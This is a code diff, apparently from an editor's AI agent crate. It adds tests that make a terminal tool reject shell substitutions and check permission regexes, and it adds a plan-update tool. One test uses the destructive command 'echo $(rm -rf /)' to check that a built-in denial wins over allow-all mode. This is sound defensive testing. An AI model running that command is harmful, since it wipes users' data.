`<(...)`, or `>(...)`. Resolve those values yourself before calling this tool, or ask the user for the literal value to use. +/// /// Do not use this tool for commands that run indefinitely, such as servers (like `npm run start`, `npm run dev`, `python -m http.server`, etc) or file watchers that don't terminate on their own. /// /// For potentially long-running commands, prefer specifying `timeout_ms` to bound runtime and prevent indefinite hangs. @@ -39,7 +41,7 @@ const COMMAND_OUTPUT_LIMIT: u64 = 16 * 1024; /// Some commands can be configured not to do this, such as `git --no-pager diff` and similar. #[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] pub struct TerminalToolInput { - /// The one-liner command to execute. + /// The one-liner command to execute. Do not include shell substitutions or interpolations such as `$VAR`, `${VAR}`, `$(...)`, backticks, `$((...))`, `<(...)`, or `>(...)`; resolve those values first or ask the user. pub command: String, /// Working directory for the command. This must be one of the root directories of the project. pub cd: String, @@ -628,4 +630,824 @@ mod tests { result ); } + + #[gpui::test] + async fn test_run_rejects_invalid_substitution_before_terminal_creation( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default() + .with_terminal(crate::tests::FakeTerminalHandle::new_never_exits(cx)) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Confirm; + settings.tool_permissions.tools.remove(TerminalTool::NAME); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "echo $HOME".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let result = task.await; + let error = result.expect_err("expected invalid terminal command to be rejected"); + assert!( + error.contains("does not allow shell substitutions or interpolations"), + "expected explicit invalid-command message, got: {error}" + ); + assert!( + environment.terminal_creation_count() == 0, + "terminal should not be created for invalid commands" + ); + assert!( + !matches!( + rx.try_next(), + Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + ), + "invalid command should not request authorization" + ); + assert!( + !matches!( + rx.try_next(), + Ok(Some(Ok(crate::ThreadEvent::ToolCallUpdate( + acp_thread::ToolCallUpdate::UpdateFields(_) + )))) + ), + "invalid command should not emit a terminal card update" + ); + } + + #[gpui::test] + async fn test_run_allows_invalid_substitution_in_unconditional_allow_all_mode( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Allow; + settings.tool_permissions.tools.remove(TerminalTool::NAME); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "echo $HOME".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let update = rx.expect_update_fields().await; + assert!( + update.content.iter().any(|blocks| { + blocks + .iter() + .any(|content| matches!(content, acp::ToolCallContent::Terminal(_))) + }), + "expected terminal content update in unconditional allow-all mode" + ); + + let result = task + .await + .expect("command should proceed in unconditional allow-all mode"); + assert!( + environment.terminal_creation_count() == 1, + "terminal should be created exactly once" + ); + assert!( + !result.contains("could not be approved"), + "unexpected invalid-command rejection output: {result}" + ); + } + + #[gpui::test] + async fn test_run_hardcoded_denial_still_wins_in_unconditional_allow_all_mode( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default() + .with_terminal(crate::tests::FakeTerminalHandle::new_never_exits(cx)) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Allow; + settings.tool_permissions.tools.remove(TerminalTool::NAME); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "echo $(rm -rf /)".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let error = task + .await + .expect_err("hardcoded denial should override unconditional allow-all"); + assert!( + error.contains("built-in security rule"), + "expected hardcoded denial message, got: {error}" + ); + assert!( + environment.terminal_creation_count() == 0, + "hardcoded denial should prevent terminal creation" + ); + assert!( + !matches!( + rx.try_next(), + Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + ), + "hardcoded denial should not request authorization" + ); + } + + #[gpui::test] + async fn test_run_env_prefixed_allow_pattern_is_used_end_to_end(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Deny; + settings.tool_permissions.tools.insert( + TerminalTool::NAME.into(), + agent_settings::ToolRules { + default: Some(settings::ToolPermissionMode::Deny), + always_allow: vec![ + agent_settings::CompiledRegex::new(r"^PAGER=blah\s+git\s+log(\s|$)", false) + .unwrap(), + ], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "PAGER=blah git log --oneline".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let update = rx.expect_update_fields().await; + assert!( + update.content.iter().any(|blocks| { + blocks + .iter() + .any(|content| matches!(content, acp::ToolCallContent::Terminal(_))) + }), + "expected terminal content update for matching env-prefixed allow rule" + ); + + let result = task + .await + .expect("expected env-prefixed command to be allowed"); + assert!( + environment.terminal_creation_count() == 1, + "terminal should be created for allowed env-prefixed command" + ); + assert!( + result.contains("command output") || result.contains("Command executed successfully."), + "unexpected terminal result: {result}" + ); + } + + #[gpui::test] + async fn test_run_old_anchored_git_pattern_no_longer_auto_allows_env_prefix( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Deny; + settings.tool_permissions.tools.insert( + TerminalTool::NAME.into(), + agent_settings::ToolRules { + default: Some(settings::ToolPermissionMode::Confirm), + always_allow: vec![ + agent_settings::CompiledRegex::new(r"^git\b", false).unwrap(), + ], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let _task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "PAGER=blah git log".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let _auth = rx.expect_authorization().await; + assert!( + environment.terminal_creation_count() == 0, + "confirm flow should not create terminal before authorization" + ); + } + + #[test] + fn test_terminal_tool_description_mentions_forbidden_substitutions() { + let description = ::description().to_string(); + + assert!( + description.contains("$VAR"), + "missing $VAR example: {description}" + ); + assert!( + description.contains("${VAR}"), + "missing ${{VAR}} example: {description}" + ); + assert!( + description.contains("$(...)"), + "missing $(...) example: {description}" + ); + assert!( + description.contains("backticks"), + "missing backticks example: {description}" + ); + assert!( + description.contains("$((...))"), + "missing $((...)) example: {description}" + ); + assert!( + description.contains("<(...)") && description.contains(">(...)"), + "missing process substitution examples: {description}" + ); + } + + #[test] + fn test_terminal_tool_input_schema_mentions_forbidden_substitutions() { + let schema = ::input_schema( + language_model::LanguageModelToolSchemaFormat::JsonSchema, + ); + let schema_json = serde_json::to_value(schema).expect("schema should serialize"); + let schema_text = schema_json.to_string(); + + assert!( + schema_text.contains("$VAR"), + "missing $VAR example: {schema_text}" + ); + assert!( + schema_text.contains("${VAR}"), + "missing ${{VAR}} example: {schema_text}" + ); + assert!( + schema_text.contains("$(...)"), + "missing $(...) example: {schema_text}" + ); + assert!( + schema_text.contains("backticks"), + "missing backticks example: {schema_text}" + ); + assert!( + schema_text.contains("$((...))"), + "missing $((...)) example: {schema_text}" + ); + assert!( + schema_text.contains("<(...)") && schema_text.contains(">(...)"), + "missing process substitution examples: {schema_text}" + ); + } + + async fn assert_rejected_before_terminal_creation( + command: &str, + cx: &mut gpui::TestAppContext, + ) { + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default() + .with_terminal(crate::tests::FakeTerminalHandle::new_never_exits(cx)) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Confirm; + settings.tool_permissions.tools.remove(TerminalTool::NAME); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: command.to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let result = task.await; + let error = result.unwrap_err(); + assert!( + error.contains("does not allow shell substitutions or interpolations"), + "command {command:?} should be rejected with substitution message, got: {error}" + ); + assert!( + environment.terminal_creation_count() == 0, + "no terminal should be created for rejected command {command:?}" + ); + assert!( + !matches!( + rx.try_next(), + Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + ), + "rejected command {command:?} should not request authorization" + ); + } + + #[gpui::test] + async fn test_rejects_variable_expansion(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo ${HOME}", cx).await; + } + + #[gpui::test] + async fn test_rejects_positional_parameter(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $1", cx).await; + } + + #[gpui::test] + async fn test_rejects_special_parameter_question(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $?", cx).await; + } + + #[gpui::test] + async fn test_rejects_special_parameter_dollar(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $$", cx).await; + } + + #[gpui::test] + async fn test_rejects_special_parameter_at(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $@", cx).await; + } + + #[gpui::test] + async fn test_rejects_command_substitution_dollar_parens(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $(whoami)", cx).await; + } + + #[gpui::test] + async fn test_rejects_command_substitution_backticks(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo `whoami`", cx).await; + } + + #[gpui::test] + async fn test_rejects_arithmetic_expansion(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $((1 + 1))", cx).await; + } + + #[gpui::test] + async fn test_rejects_process_substitution_input(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("cat <(ls)", cx).await; + } + + #[gpui::test] + async fn test_rejects_process_substitution_output(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("ls >(cat)", cx).await; + } + + #[gpui::test] + async fn test_rejects_env_prefix_with_variable(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("PAGER=$HOME git log", cx).await; + } + + #[gpui::test] + async fn test_rejects_env_prefix_with_command_substitution(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("PAGER=$(whoami) git log", cx).await; + } + + #[gpui::test] + async fn test_rejects_env_prefix_with_brace_expansion(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation( + "GIT_SEQUENCE_EDITOR=${EDITOR} git rebase -i HEAD~2", + cx, + ) + .await; + } + + #[gpui::test] + async fn test_rejects_multiline_with_forbidden_on_second_line(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo ok\necho $HOME", cx).await; + } + + #[gpui::test] + async fn test_rejects_multiline_with_forbidden_mixed(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("PAGER=less git log\necho $(whoami)", cx).await; + } + + #[gpui::test] + async fn test_rejects_nested_command_substitution(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $(cat $(whoami).txt)", cx).await; + } + + #[gpui::test] + async fn test_allow_all_terminal_specific_default_with_empty_patterns( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Deny; + settings.tool_permissions.tools.insert( + TerminalTool::NAME.into(), + agent_settings::ToolRules { + default: Some(settings::ToolPermissionMode::Allow), + always_allow: vec![], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "echo $(whoami)".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let update = rx.expect_update_fields().await; + assert!( + update.content.iter().any(|blocks| { + blocks + .iter() + .any(|content| matches!(content, acp::ToolCallContent::Terminal(_))) + }), + "terminal-specific allow-all should bypass substitution rejection" + ); + + let result = task + .await + .expect("terminal-specific allow-all should let the command proceed"); + assert!( + environment.terminal_creation_count() == 1, + "terminal should be created exactly once" + ); + assert!( + !result.contains("could not be approved"), + "unexpected rejection output: {result}" + ); + } + + #[gpui::test] + async fn test_env_prefix_pattern_rejects_different_value(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Deny; + settings.tool_permissions.tools.insert( + TerminalTool::NAME.into(), + agent_settings::ToolRules { + default: Some(settings::ToolPermissionMode::Deny), + always_allow: vec![ + agent_settings::CompiledRegex::new(r"^PAGER=blah\s+git\s+log(\s|$)", false) + .unwrap(), + ], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, _rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "PAGER=other git log".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let error = task + .await + .expect_err("different env-var value should not match allow pattern"); + assert!( + error.contains("could not be approved") + || error.contains("denied") + || error.contains("disabled"), + "expected denial for mismatched env value, got: {error}" + ); + assert!( + environment.terminal_creation_count() == 0, + "terminal should not be created for non-matching env value" + ); + } + + #[gpui::test] + async fn test_env_prefix_multiple_assignments_preserved_in_order( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Deny; + settings.tool_permissions.tools.insert( + TerminalTool::NAME.into(), + agent_settings::ToolRules { + default: Some(settings::ToolPermissionMode::Deny), + always_allow: vec![ + agent_settings::CompiledRegex::new(r"^A=1\s+B=2\s+git\s+log(\s|$)", false) + .unwrap(), + ], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "A=1 B=2 git log".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let update = rx.expect_update_fields().await; + assert!( + update.content.iter().any(|blocks| { + blocks + .iter() + .any(|content| matches!(content, acp::ToolCallContent::Terminal(_))) + }), + "multi-assignment pattern should match and produce terminal content" + ); + + let result = task + .await + .expect("multi-assignment command matching pattern should be allowed"); + assert!( + environment.terminal_creation_count() == 1, + "terminal should be created for matching multi-assignment command" + ); + assert!( + result.contains("command output") || result.contains("Command executed successfully."), + "unexpected terminal result: {result}" + ); + } + + #[gpui::test] + async fn test_env_prefix_quoted_whitespace_value_matches_only_with_quotes_in_pattern( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Deny; + settings.tool_permissions.tools.insert( + TerminalTool::NAME.into(), + agent_settings::ToolRules { + default: Some(settings::ToolPermissionMode::Deny), + always_allow: vec![ + agent_settings::CompiledRegex::new( + r#"^PAGER="less\ -R"\s+git\s+log(\s|$)"#, + false, + ) + .unwrap(), + ], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "PAGER=\"less -R\" git log".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let update = rx.expect_update_fields().await; + assert!( + update.content.iter().any(|blocks| { + blocks + .iter() + .any(|content| matches!(content, acp::ToolCallContent::Terminal(_))) + }), + "quoted whitespace value should match pattern with quoted form" + ); + + let result = task + .await + .expect("quoted whitespace env value matching pattern should be allowed"); + assert!( + environment.terminal_creation_count() == 1, + "terminal should be created for matching quoted-value command" + ); + assert!( + result.contains("command output") || result.contains("Command executed successfully."), + "unexpected terminal result: {result}" + ); + } } diff --git a/crates/agent/src/tools/update_plan_tool.rs b/crates/agent/src/tools/update_plan_tool.rs new file mode 100644 index 0000000000000000000000000000000000000000..9fdc5a865dfb5cd2a18e3f24b3f7544b397588d3 --- /dev/null +++ b/crates/agent/src/tools/update_plan_tool.rs @@ -0,0 +1,290 @@ +use crate::{AgentTool, ToolCallEventStream, ToolInput}; +use agent_client_protocol as acp; +use gpui::{App, SharedString, Task}; +use schemars::JsonSchema; +use serde::{Deserialize, Serialize}; +use std::sync::Arc; + +#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema, PartialEq, Eq)] +#[serde(rename_all = "snake_case")] +#[schemars(inline)] +pub enum PlanEntryStatus { + /// The task has not started yet. + Pending, + /// The task is currently being worked on. + InProgress, + /// The task has been successfully completed. + Completed, +} + +impl From for acp::PlanEntryStatus { + fn from(value: PlanEntryStatus) -> Self { + match value { + PlanEntryStatus::Pending => acp::PlanEntryStatus::Pending, + PlanEntryStatus::InProgress => acp::PlanEntryStatus::InProgress, + PlanEntryStatus::Completed => acp::PlanEntryStatus::Completed, + } + } +} + +#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema, PartialEq, Eq, Default)] +#[serde(rename_all = "snake_case")] +#[schemars(inline)] +pub enum PlanEntryPriority { + High, + #[default] + Medium, + Low, +} + +impl From for acp::PlanEntryPriority { + fn from(value: PlanEntryPriority) -> Self { + match value { + PlanEntryPriority::High => acp::PlanEntryPriority::High, + PlanEntryPriority::Medium => acp::PlanEntryPriority::Medium, + PlanEntryPriority::Low => acp::PlanEntryPriority::Low, + } + } +} + +#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema, PartialEq, Eq)] +pub struct PlanItem { + /// Human-readable description of what this task aims to accomplish. + pub step: String, + /// The current status of this task. + pub status: PlanEntryStatus, + /// The relative importance of this task. Defaults to medium when omitted. + #[serde(default)] + pub priority: PlanEntryPriority, +} + +impl From for acp::PlanEntry { + fn from(value: PlanItem) -> Self { + acp::PlanEntry::new(value.step, value.priority.into(), value.status.into()) + } +} + +/// Updates the task plan. +/// Provide a list of plan entries, each with step, status, and optional priority. +#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema, PartialEq, Eq)] +pub struct UpdatePlanToolInput { + /// The list of plan entries and their current statuses. + pub plan: Vec, +} + +pub struct UpdatePlanTool; + +impl UpdatePlanTool { + fn to_plan(input: UpdatePlanToolInput) -> acp::Plan { + acp::Plan::new(input.plan.into_iter().map(Into::into).collect()) + } +} + +impl AgentTool for UpdatePlanTool { + type Input = UpdatePlanToolInput; + type Output = String; + + const NAME: &'static str = "update_plan"; + + fn kind() -> acp::ToolKind { + acp::ToolKind::Think + } + + fn initial_title( + &self, + input: Result, + _cx: &mut App, + ) -> SharedString { + match input { + Ok(input) if input.plan.is_empty() => "Clear plan".into(), + Ok(_) | Err(_) => "Update plan".into(), + } + } + + fn run( + self: Arc, + input: ToolInput, + event_stream: ToolCallEventStream, + cx: &mut App, + ) -> Task> { + cx.spawn(async move |_cx| { + let input = input + .recv() + .await + .map_err(|e| format!("Failed to receive tool input: {e}"))?; + + event_stream.update_plan(Self::to_plan(input)); + + Ok("Plan updated".to_string()) + }) + } + + fn replay( + &self, + input: Self::Input, + _output: Self::Output, + event_stream: ToolCallEventStream, + _cx: &mut App, + ) -> anyhow::Result<()> { + event_stream.update_plan(Self::to_plan(input)); + Ok(()) + } +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::ToolCallEventStream; + use gpui::TestAppContext; + use pretty_assertions::assert_eq; + + fn sample_input() -> UpdatePlanToolInput { + UpdatePlanToolInput { + plan: vec![ + PlanItem { + step: "Inspect the existing tool wiring".to_string(), + status: PlanEntryStatus::Completed, + priority: PlanEntryPriority::High, + }, + PlanItem { + step: "Implement the update_plan tool".to_string(), + status: PlanEntryStatus::InProgress, + priority: PlanEntryPriority::Medium, + }, + PlanItem { + step: "Add tests".to_string(), + status: PlanEntryStatus::Pending, + priority: PlanEntryPriority::Low, + }, + ], + } + } + + #[gpui::test] + async fn test_run_emits_plan_event(cx: &mut TestAppContext) { + let tool = Arc::new(UpdatePlanTool); + let (event_stream, mut event_rx) = ToolCallEventStream::test(); + + let input = sample_input(); + let result = cx + .update(|cx| tool.run(ToolInput::resolved(input.clone()), event_stream, cx)) + .await + .expect("tool should succeed"); + + assert_eq!(result, "Plan updated".to_string()); + + let plan = event_rx.expect_plan().await; + assert_eq!( + plan, + acp::Plan::new(vec![ + acp::PlanEntry::new( + "Inspect the existing tool wiring", + acp::PlanEntryPriority::High, + acp::PlanEntryStatus::Completed, + ), + acp::PlanEntry::new( + "Implement the update_plan tool", + acp::PlanEntryPriority::Medium, + acp::PlanEntryStatus::InProgress, + ), + acp::PlanEntry::new( + "Add tests", + acp::PlanEntryPriority::Low, + acp::PlanEntryStatus::Pending, + ), + ]) + ); + } + + #[gpui::test] + async fn test_replay_emits_plan_event(cx: &mut TestAppContext) { + let tool = UpdatePlanTool; + let (event_stream, mut event_rx) = ToolCallEventStream::test(); + + let input = sample_input(); + + cx.update(|cx| { + tool.replay(input.clone(), "Plan updated".to_string(), event_stream, cx) + .expect("replay should succeed"); + }); + + let plan = event_rx.expect_plan().await; + assert_eq!( + plan, + acp::Plan::new(vec![ + acp::PlanEntry::new( + "Inspect the existing tool wiring", + acp::PlanEntryPriority::High, + acp::PlanEntryStatus::Completed, + ), + acp::PlanEntry::new( + "Implement the update_plan tool", + acp::PlanEntryPriority::Medium, + acp::PlanEntryStatus::InProgress, + ), + acp::PlanEntry::new( + "Add tests", + acp::PlanEntryPriority::Low, + acp::PlanEntryStatus::Pending, + ), + ]) + ); + } + + #[gpui::test] + async fn test_run_defaults_priority_to_medium(cx: &mut TestAppContext) { + let tool = Arc::new(UpdatePlanTool); + let (event_stream, mut event_rx) = ToolCallEventStream::test(); + + let input = UpdatePlanToolInput { + plan: vec![ + PlanItem { + step: "First".to_string(), + status: PlanEntryStatus::InProgress, + priority: PlanEntryPriority::default(), + }, + PlanItem { + step: "Second".to_string(), + status: PlanEntryStatus::InProgress, + priority: PlanEntryPriority::default(), + }, + ], + }; + + let result = cx + .update(|cx| tool.run(ToolInput::resolved(input), event_stream, cx)) + .await + .expect("tool should succeed"); + + assert_eq!(result, "Plan updated".to_string()); + + let plan = event_rx.expect_plan().await; + assert_eq!( + plan, + acp::Plan::new(vec![ + acp::PlanEntry::new( + "First", + acp::PlanEntryPriority::Medium, + acp::PlanEntryStatus::InProgress, + ), + acp::PlanEntry::new( + "Second", + acp::PlanEntryPriority::Medium, + acp::PlanEntryStatus::InProgress, + ), + ]) + ); + } + + #[gpui::test] + async fn test_initial_title(cx: &mut TestAppContext) { + let tool = UpdatePlanTool; + + let title = cx.update(|cx| tool.initial_title(Ok(sample_input()), cx)); + assert_eq!(title, SharedString::from("Update plan")); + + let title = + cx.update(|cx| tool.initial_title(Ok(UpdatePlanToolInput { plan: Vec::new() }), cx)); + assert_eq!(title, SharedString::from("Clear plan")); + } +} diff --git a/crates/agent_servers/Cargo.toml b/crates/agent_servers/Cargo.toml index 4fb4109129ee5b8896f7a62afe49e0bcaef701ed..1542466be35bbce80983a73a3fc2e0998799160c 100644 --- a/crates/agent_servers/Cargo.toml +++ b/crates/agent_servers/Cargo.toml @@ -30,6 +30,7 @@ env_logger = { workspace = true, optional = true } fs.workspace = true futures.workspace = true gpui.workspace = true +feature_flags.workspace = true gpui_tokio = { workspace = true, optional = true } credentials_provider.workspace = true google_ai.workspace = true diff --git 